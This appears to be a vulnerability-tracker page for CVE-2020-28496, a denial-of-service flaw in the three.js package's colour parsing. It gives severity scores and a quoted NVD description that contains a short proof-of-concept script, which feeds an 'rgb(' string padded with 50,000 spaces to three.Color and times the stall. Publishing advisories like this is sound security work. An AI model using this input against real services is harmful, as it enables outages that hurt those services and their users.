AUGUST 4, 2026
Live Feed
Back to database
Case File

CVE-2020-28496

HIGH · CVSS 7.5 EPSS 2.52% Public Exploit

Source: NVD + CISA KEV + EPSS (historical backfill) · Published 2021-02-18 · Last synced 2026-08-04

CyberRota Analysis

This is a high severity vulnerability with a CVSS score of 7.5. Public exploit code or proof-of-concept references have been detected in its references.

Public Exploit Signal

A public exploit, PoC, GitHub repository or Metasploit reference was detected for this CVE.

Detected Signals
poc

Note: these links are listed for security research and verification purposes only.

CVE
CVE-2020-28496
Severity
HIGH
CVSS
7.5
EPSS
2.52%

Original NVD Description

This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")